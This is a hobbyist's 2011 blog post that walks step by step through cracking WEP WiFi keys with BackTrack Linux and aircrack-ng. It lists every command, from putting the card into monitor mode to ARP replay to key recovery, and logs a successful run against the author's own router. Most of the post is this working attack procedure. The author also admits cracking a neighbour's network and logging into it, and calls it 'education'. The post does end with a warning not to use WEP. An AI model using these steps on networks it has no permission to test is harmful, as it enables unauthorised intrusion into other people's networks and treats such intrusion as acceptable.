Search This Blog

Friday, August 12, 2011

Playing with hacking into WEP secured WiFi networks


I read about a WiFi sniffing RC plane that finds and cracks WiFi networks (forgot to note the link)
For no reason other than fun and education, I wanted to try a little WEP cracking.  Totally off topic on my blog yet again.  Dang that thirst for knowledge of the gray areas of life.  I wanted to see if this youtube video was for real.

Found a video on WEP cracking, that points to Backtrack Linux that was mentioned in the RC plane story.
http://www.youtube.com/watch?v=jETwvEDaJeQ
Only 1,6120,761 hits.  So I guess most of the world has already tried this.  There are an embarrassing number of youtube videos on the subject.   This is old hat I suppose.

I'm a hacking noob, but I'm an experienced unix and linux user, even had sys admin training.  I'll try to keep the blog understandable but I might skip a few steps in the unix stuff because I thought they were obvious.
This is for WEP which is well known to be pretty weak, WPA and WPA2 are better, but they are crack-able too.  A lot of people still use WEP, and I even have a WEP network section in my house because the Nintendo's can't do WPA.

Downloaded backtrack penetration testing linux .iso file from here,
http://sourceforge.net/projects/unetbootin/files/UNetbootin/549/unetbootin-win-549.exe/download
and used those instructions to load it on a USB, http://www.backtrack-linux.org/tutorials/usb-live-install/  this takes about 8 hours.   This appears to be nothing but a generic linux install that has a bunch of networking and hacking tools pre-installed.    I bet you could do this from ubuntu as well by installing the tools.  


Rebooted with the USB after changing my bios to prefer the USB as the boot device (spam delete key as the machine is booting, and then change the hard disk priority order on the menu that pops up) and immediately had the problem that i couldn't "startx".  Google gave me this answer:
http://www.backtrack-linux.org/forums/backtrack-5-fixes/40286-bt5-kde-64bit-startx-problem.html
http://www.cyberciti.biz/faq/errorstartx-does-not-work-in-backtrack-linux5-kde64bit/

:-( Neither solution worked.  My problem is it can't create the /var/log/Xorg.0.log file. There is some sort of 64 bit KDE bug, so i'm going to try downloading again and using GNU.  Darn i like KDE, but oh well.

8 hours later, downloaded the GNU desktop version, picked the 64bit .iso file.   Maybe 32 bit would be more universal, but most modern machines can run 64 bit.   Followed the steps to use unetbootin utility to install it on a 4GB memory stick.  Went smoothly.  Now I can boot up and startx gets me into the graphical interface.  w00t!

I've transcribed the commands from the video here:   The [brackets] aren't typed, they surround things you need to fill in that you learned on a previous step.   I'm just copying them down now, i'll try them in the next pass.
  • Open a command line console window and type   "/etc/init.d/networking start"   This starts the network.
  • Find out what the wireless card is called by typing  "airmon-ng
  • We want to put it in monitor mode so we type "airmon-ng stop [wireless card name from previous step]
  • Then "airmon-ng start [wireless card name]
  • then type "airmon-ng"  again to see what changes
  • Now we scan for SSIDs.  Type airodump-ng [wireless card name]
  • Find ones with WEP and write down channel, bssid, essid 
  • Hit ctrl-c to stop
  • To link the wireless card to a particular connection, type airodump-ng -w wep -c [channel] --bssid [bssid] [wireless card name]
  • Let it run 
  • Open a new console window meanwhile and type "aireplay-ng -1 0 -a [bssid] [wireless card name]"  This apparently associates your wireless card with the connection so you can transmit data.  
  • Open another new console and type "aireplay-ng -3 -b [bssid] [wireless card name]"  to start sending and receiving data packets on the wireless connection
  • Go back to the first terminal and watch the data column, run until data hits 30,000.  This will take an hour or so.  Hmmm.  I thought this might be faster, makes it a bit less useful.
  • Go to the the third console window that is sending and receiving data and hit ctrl-c to stop it
  • Type "dir" and look at the directory.  Apparently a file will be created *.cap that will have the wireless key.
  • Type aircrack-ng [filename].cap
  • And it will return the WEP key.
Now to try it on my home WEP network and see what happens

I'm using my desktop PC with both a wired connection and a I just put in an old wireless PCI card to use for this experiment that has never seen my wireless network before.  This is not a laptop.  One issue i have is that several of my laptops won't boot from the USB, or at least there is no choice to do that from the BIOS menu. So wardriving with my desktop is ruled out ;-)

First problem, once i installed the wireless card, now backtrack linux won't boot anymore.  Maybe a coincidence, maybe not.  The machine is booting ok in windows.  Backtrack sticks at "failed to allocate :" and complaining about my graphics card drivers.  Weird.   Rebooted in windows and now i see speckles on my desktop.  Powered down, reseated all the cards, wiggled the connectors and the speckles are gone.  Chalking this up to a loose connection from installing the wireless PCI card.   Rebooted in backtrack.  Still no dice.  Arrggh.   I get the error "panic occurred, switch back to text console".    It may be a USB problem.  One of those days.  Reflashed the USB from unetbootin.  w00t. that worked.  Back in business.

Here is a log of the instructions and what happened at every step:
  • Open a command line console window and type   "/etc/init.d/networking start"   This starts the network.
    • Got a message that I should use "service networking start" instead because the script has been converted.  OK I typed "service networking start"
  • Find out what the wireless card is called by typing  "airmon-ng
    • Got back "wlan0    Ralink 2561 PCI rt61pci - [phy0]"  not sure what the name is, maybe wlan0.  I'll try that.
  • We want to put it in monitor mode so we type "airmon-ng stop wlan0"
    • seemed to work using wlan0, says "monitor mode disabled"
  • Then "airmon-ng start wlan0
    • says "monitormode enabled on mon0"
  • then type "airmon-ng"  again to see what changes
    • now it has two devices, wlan0 and mon0.   
  • Now we scan for SSIDs.  Type airodump-ng wlan0
    •  it begins scanning and shows my two wireless networks.  Power, channel, etc.   Unfortunately there is no traffic on my WEP network right now, since it is mostly unused.
  • Find ones with WEP and write down channel, bssid, essid 
    • bssd  00:1D:7E:EF:58:D7
    • channel 5
    • essid "TARDIS"  (i knew that, it's my router :D )
  • Hit ctrl-c to stop
    • OK
  • To link the wireless card to a particular connection, type airodump-ng -w wep -c 5 --bssid 00:1D:7E:EF:58:D7 wlan0
    •  OK it's sitting there.  Need to go turn something on to make traffic
  • Let it run 
    •  No big surprise, i logged a computer onto the network and did some surfing.    The packet count immediately climbed. 
  • Open a new console window meanwhile and type "aireplay-ng -1 0 -a 00:1D:7E:EF:58:D7 wlan0"  This apparently associates your wireless card with the connection so you can transmit data. 
    • comes back Association successful, etc
  • Open another new console and type "aireplay-ng -3 -b 00:1D:7E:EF:58:D7 wlan0"  to start sending and receiving data packets on the wireless connection
    • Says it is saving ARP requests and packet count starts counting up, and we should airodump-ng to capture replies.  Of course we did that in the first terminal window, so all is good
  • Go back to the first terminal and watch the data column, run until data hits 30,000.  This will take an hour or so. 
    • This terminal had paused, hitting space got it counting along again
    • after a bit the terminal i typed aireplay in started scrolling reading and writing stuff.  Son was playing warcraft.  Interesting, it pushed his latency through the roof during this test.  However the packets got to 500000 in just a few minutes
  • Go to the the third console window that is sending and receiving data and hit ctrl-c to stop it
    •  OK, it stopped
  • Type "dir" and look at the directory.  Apparently a file will be created *.cap that will have the wireless key.
    • it meanwhile had created a file replay_arp-0813-231234.cap  and another wep-01.cap.   Not sure which is the right one.  wep-01.cap is the big one, so I'll try that one first.
  • Type aircrack-ng wep-01.cap
  • And it will return the WEP key.
    •  In a few seconds it came back with decrypted correctly 100%.  It printed my key (i know what my key is, and it was right).  All 26 characters of it.

So the verdict is.... it works!  It's easy.  I proved it.   The whole process, other than the downloading, took maybe 15 minutes.  It could have been scripted.   The bottom line is anybody who can watch youtube who has a little patience can crack your WEP key.   Don't use WEP.    Put your router in the basement like I do, so that nobody outside the house can get enough signal to use your network.

Some other things I learned:

Backtrack Linux is a little finicky to boot.  Of four laptops and one desktop I tried, the desktop booted 50% of the time, one of the laptops wouldn't boot from USB at all, and of the three modern high end laptops, only  one of the three would boot into backtrack.   The others threw off arcane errors of panics and inability to do some hardware task.    The laptop that did work was fine.   I'd explore installing the backtrack to a dual boot or using ubuntu and installing the tools you need, rather than using backtrack live from a USB.  I haven't tried that yet though.

It is really easy and fast once you know what you are doing.  I did try (internet confession) this on one of the random 6 neighboring WEP networks that I can get from my kitchen table.   Now that I had my network under my belt, the whole process took 5 minutes and I had a key.  I logged into windows and it worked.  Since I have no nefarious purpose, other than education, the experiment ended there.   It seems that verizon fios sets people up with default WEP security, and only a 40 bit key.  Lame.  However 128 bit key didn't give my network any more protection.

aircrack-ng is downloadable on ubuntu's synaptic package manager.  So it looks like you don't need to use the backtrack-linux unless you want to use the other tools that OS includes.

The process works by watching traffic and collecting data.  So a quiet network is harder to crack.  A busy one takes no time at all.

Next to try the tools on my WPA2-PSK network...


1 comment:

  1. Hey,

    I am currently writing a book for Apress LLC and I would like to use one of the functions that you use in your GPS datalogging project it is call printFloat() If you could get back to me as soon as possible with the permission I would greatly appreciate it. my email address is htimmis2005@my.fit.edu.

    Thank You,
    Harold Timmis

    ReplyDelete